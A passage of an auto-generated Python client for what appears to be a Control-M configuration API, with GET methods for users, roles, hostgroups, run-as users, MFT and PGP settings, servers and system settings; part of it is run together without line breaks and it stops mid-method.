        :param str description: The user description.
        :return: list[UserHeader]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'full_name', 'description']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_all_users" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'name' in params:
            query_params.append(('name', params['name']))  # noqa: E501
        # Note the snake_case -> camelCase mapping for the wire parameter.
        if 'full_name' in params:
            query_params.append(('fullName', params['full_name']))  # noqa: E501
        if 'description' in params:
            query_params.append(('description', params['description']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/authorization/users', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[UserHeader]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_fts_settings(self, server, agent, **kwargs):  # noqa: E501
        """Get File Transfer Server (FTS) configuration data.  # noqa: E501

        Get File Transfer Server (FTS) configuration data.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_fts_settings(server, agent, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :return: FtsSettingsData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_fts_settings_with_http_info(server, agent, **kwargs)  # noqa: E501
        else:
            (data) = self.get_fts_settings_with_http_info(server, agent, **kwargs)  # noqa: E501
            return data

    def get_fts_settings_with_http_info(self, server, agent, **kwargs):  # noqa: E501
        """Get File Transfer Server (FTS) configuration data.  # noqa: E501

        Get File Transfer Server (FTS) configuration data.  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_fts_settings_with_http_info(server, agent, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server (required)
        :param str agent: The Agent (required)
        :return: FtsSettingsData
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server', 'agent']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_fts_settings" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `get_fts_settings`")  # noqa: E501
        # verify the required parameter 'agent' is set
        if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `agent` when calling `get_fts_settings`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'agent' in params:
            path_params['agent'] = params['agent']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/agent/{agent}/mft/fts/settings', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='FtsSettingsData',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_hostgroups(self, server, **kwargs):  # noqa: E501
        """get Server hostgroups  # noqa: E501

        Get all the hostgroups of the specified Server.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_hostgroups(server, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the hostgroups belong to. (required)
        :return: StringListResult
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_hostgroups_with_http_info(server, **kwargs)  # noqa: E501
        else:
            (data) = self.get_hostgroups_with_http_info(server, **kwargs)  # noqa: E501
            return data

    def get_hostgroups_with_http_info(self, server, **kwargs):  # noqa: E501
        """get Server hostgroups  # noqa: E501

        Get all the hostgroups of the specified Server.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_hostgroups_with_http_info(server, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the hostgroups belong to. (required)
        :return: StringListResult
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_hostgroups" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `get_hostgroups`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/hostgroups', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='StringListResult',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_hosts_in_group(self, server, hostgroup, **kwargs):  # noqa: E501
        """get hostgroup agents  # noqa: E501

        Get the agents that compose the specified hostgroup  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_hosts_in_group(server, hostgroup, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the hostgroup belongs to. (required)
        :param str hostgroup: The hostgroup name (required)
        :return: AgentsInGroupListResult
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_hosts_in_group_with_http_info(server, hostgroup, **kwargs)  # noqa: E501
        else:
            (data) = self.get_hosts_in_group_with_http_info(server, hostgroup, **kwargs)  # noqa: E501
            return data

    def get_hosts_in_group_with_http_info(self, server, hostgroup, **kwargs):  # noqa: E501
        """get hostgroup agents  # noqa: E501

        Get the agents that compose the specified hostgroup  # noqa: E501
        This method makes a synchronous HTTP request by default.
        To make an asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_hosts_in_group_with_http_info(server, hostgroup, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str server: The Server the hostgroup belongs to. (required)
        :param str hostgroup: The hostgroup name (required)
        :return: AgentsInGroupListResult
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['server', 'hostgroup']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_hosts_in_group" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'server' is set
        if self.api_client.client_side_validation and ('server' not in params or params['server'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `server` when calling `get_hosts_in_group`")  # noqa: E501
        # verify the required parameter 'hostgroup' is set
        if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None):  # noqa: E501
            raise ValueError("Missing the required parameter `hostgroup` when calling `get_hosts_in_group`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'server' in params:
            path_params['server'] = params['server']  # noqa: E501
        if 'hostgroup' in params:
            path_params['hostgroup'] = params['hostgroup']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['ApiKeyAuth']  # noqa: E501

        return self.api_client.call_api(
            '/config/server/{server}/hostgroup/{hostgroup}/agents', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AgentsInGroupListResult',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_identity_provider_metadata(self, **kwargs): # noqa: E501 """Get identity Provider Metadata file # noqa: E501 Get identity Provider Metadata file # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_identity_provider_metadata(async_req=True) >>> result = thread.get() :param async_req bool :return: str If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_identity_provider_metadata_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_identity_provider_metadata_with_http_info(**kwargs) # noqa: E501 return data def get_identity_provider_metadata_with_http_info(self, **kwargs): # noqa: E501 """Get identity Provider Metadata file # noqa: E501 Get identity Provider Metadata file # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_identity_provider_metadata_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: str If the method is called asynchronously, returns the request thread. 
""" all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_identity_provider_metadata" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json', 'application/xml']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/systemsettings/saml2identityprovidermetadata', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='str', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_mft_configuration(self, server, agent, **kwargs): # noqa: E501 """Get MFT Configuration # noqa: E501 Get MFT Configuration # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_mft_configuration(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :return: MftConfigurationData If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_mft_configuration_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.get_mft_configuration_with_http_info(server, agent, **kwargs) # noqa: E501 return data def get_mft_configuration_with_http_info(self, server, agent, **kwargs): # noqa: E501 """Get MFT Configuration # noqa: E501 Get MFT Configuration # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_mft_configuration_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :return: MftConfigurationData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_mft_configuration" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_mft_configuration`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_mft_configuration`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = 
params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/configuration', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='MftConfigurationData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_pgp_templates(self, server, agent, **kwargs): # noqa: E501 """Get PGP Templates # noqa: E501 Get PGP Templates # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_pgp_templates(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str name: The PGP Template Name :return: list[PgpTemplateData] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_pgp_templates_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.get_pgp_templates_with_http_info(server, agent, **kwargs) # noqa: E501 return data def get_pgp_templates_with_http_info(self, server, agent, **kwargs): # noqa: E501 """Get PGP Templates # noqa: E501 Get PGP Templates # noqa: E501 This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_pgp_templates_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str name: The PGP Template Name :return: list[PgpTemplateData] If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'name'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_pgp_templates" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_pgp_templates`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_pgp_templates`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] if 'name' in params: query_params.append(('name', params['name'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( 
'/config/server/{server}/agent/{agent}/mft/pgptemplates', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[PgpTemplateData]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_role(self, role, **kwargs): # noqa: E501 """Get Authorization Role # noqa: E501 Get Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_role(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: RoleData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_role_with_http_info(role, **kwargs) # noqa: E501 else: (data) = self.get_role_with_http_info(role, **kwargs) # noqa: E501 return data def get_role_with_http_info(self, role, **kwargs): # noqa: E501 """Get Authorization Role # noqa: E501 Get Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_role_with_http_info(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: RoleData If the method is called asynchronously, returns the request thread. 
""" all_params = ['role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `get_role`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RoleData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_role_associates(self, role, **kwargs): # noqa: E501 """Get all authorization entities associated with role # noqa: E501 Get all authorization entities associated with role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_role_associates(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: role name. 
(required) :return: list[AssociateData] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_role_associates_with_http_info(role, **kwargs) # noqa: E501 else: (data) = self.get_role_associates_with_http_info(role, **kwargs) # noqa: E501 return data def get_role_associates_with_http_info(self, role, **kwargs): # noqa: E501 """Get all authorization entities associated with role # noqa: E501 Get all authorization entities associated with role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_role_associates_with_http_info(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: role name. (required) :return: list[AssociateData] If the method is called asynchronously, returns the request thread. """ all_params = ['role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_role_associates" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `get_role_associates`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = 
['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}/associates', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[AssociateData]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_run_as_user(self, server, agent, user, **kwargs): # noqa: E501 """Get Run-as user # noqa: E501 Get Run-as user details from server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_run_as_user(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :return: RunAsUserData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 else: (data) = self.get_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 return data def get_run_as_user_with_http_info(self, server, agent, user, **kwargs): # noqa: E501 """Get Run-as user # noqa: E501 Get Run-as user details from server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_run_as_user_with_http_info(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. 
(required) :param str agent: The Agent (required) :param str user: The user name (required) :return: RunAsUserData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'user'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_run_as_user`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_run_as_user`") # noqa: E501 # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `get_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( 
'/config/server/{server}/runasuser/{agent}/{user}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RunAsUserData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_run_as_users_list(self, server, **kwargs): # noqa: E501 """Get Run-as user list that match the requested search criteria. # noqa: E501 Get Run-as user list that match the requested search criteria from server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_run_as_users_list(server, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str user: The Run-as user. :param str agent: The agent. :return: RunAsUsersList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_run_as_users_list_with_http_info(server, **kwargs) # noqa: E501 else: (data) = self.get_run_as_users_list_with_http_info(server, **kwargs) # noqa: E501 return data def get_run_as_users_list_with_http_info(self, server, **kwargs): # noqa: E501 """Get Run-as user list that match the requested search criteria. # noqa: E501 Get Run-as user list that match the requested search criteria from server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_run_as_users_list_with_http_info(server, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str user: The Run-as user. :param str agent: The agent. 
:return: RunAsUsersList If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'user', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_run_as_users_list" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_run_as_users_list`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 query_params = [] if 'user' in params: query_params.append(('user', params['user'])) # noqa: E501 if 'agent' in params: query_params.append(('agent', params['agent'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasusers', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RunAsUsersList', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_servers(self, **kwargs): # noqa: E501 """get all the Servers name and hostname in the system # noqa: E501 Get the names 
and hostnames of all Servers in the system. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_servers(async_req=True) >>> result = thread.get() :param async_req bool :return: CtmDetailsList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_servers_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_servers_with_http_info(**kwargs) # noqa: E501 return data def get_servers_with_http_info(self, **kwargs): # noqa: E501 """get all the Servers name and hostname in the system # noqa: E501 Get the names and hostnames of all Servers in the system. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_servers_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: CtmDetailsList If the method is called asynchronously, returns the request thread. 
""" all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_servers" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/servers', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='CtmDetailsList', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_system_setting(self, **kwargs): # noqa: E501 """Get system setting for Control-M environment # noqa: E501 Get system setting for Control-M environment # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_system_setting(async_req=True) >>> result = thread.get() :param async_req bool :param str server: Server to which the system settings are applied :return: SystemSetting If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_system_setting_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_system_setting_with_http_info(**kwargs) # noqa: E501 return data def get_system_setting_with_http_info(self, **kwargs): # noqa: E501 """Get system setting for Control-M environment # noqa: E501 Get system setting for Control-M environment # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_system_setting_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :param str server: Server to which the system settings are applied :return: SystemSetting If the method is called asynchronously, returns the request thread. """ all_params = ['server'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_system_setting" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'server' in params: query_params.append(('server', params['server'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = 